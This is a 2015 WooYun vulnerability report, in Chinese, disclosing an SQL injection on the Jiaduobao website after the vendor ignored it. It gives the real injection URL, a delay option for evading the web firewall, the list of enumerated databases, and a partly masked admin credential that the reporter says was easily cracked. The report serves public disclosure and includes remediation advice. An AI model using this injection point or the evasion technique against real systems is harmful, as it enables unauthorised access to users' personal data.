漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0119700
漏洞标题:加多宝主站存在SQL注入漏洞可垮裤(涉及700多w用户信息及手机号)
相关厂商:加多宝
漏洞作者: 蛋清
提交时间:2015-06-11 11:23
修复时间:2015-07-26 11:24
公开时间:2015-07-26 11:24
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:5
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-06-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-26: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
为什么要日?因为爱啊~~最近团队天天喝加多宝,喝到破产,不知道能不能换几箱加多宝,,, ^_^
详细说明:
注入点:
http://www.jdb.cn/2013/grzx/UploadHeadPortrait.aspx?id=42ab6690-de46-4f09-b468-f9108ebd030c
--delay 2 规定两个数据包发送的延时(绕过waf)
漏洞证明:
[*] jiaduobao2013
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] tmp2013
[*] tmp20131
[*] VTime
[*] wljnew
[*] wljnew2013
[*] wljtest
admin na*****3
修复方案:
1.后台藏起来
2.数据库权限控制
3.管理员密码尽量复杂。cmd5一下就出来了
你们比我们更专业~
为什么要日?因为爱啊~~最近团队天天喝加多宝,喝到破产,不知道能不能换几箱加多宝,,, ^_^
PS:之前好像被日过了。你们自己清查一下吧。
版权声明:转载请注明来源 蛋清@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝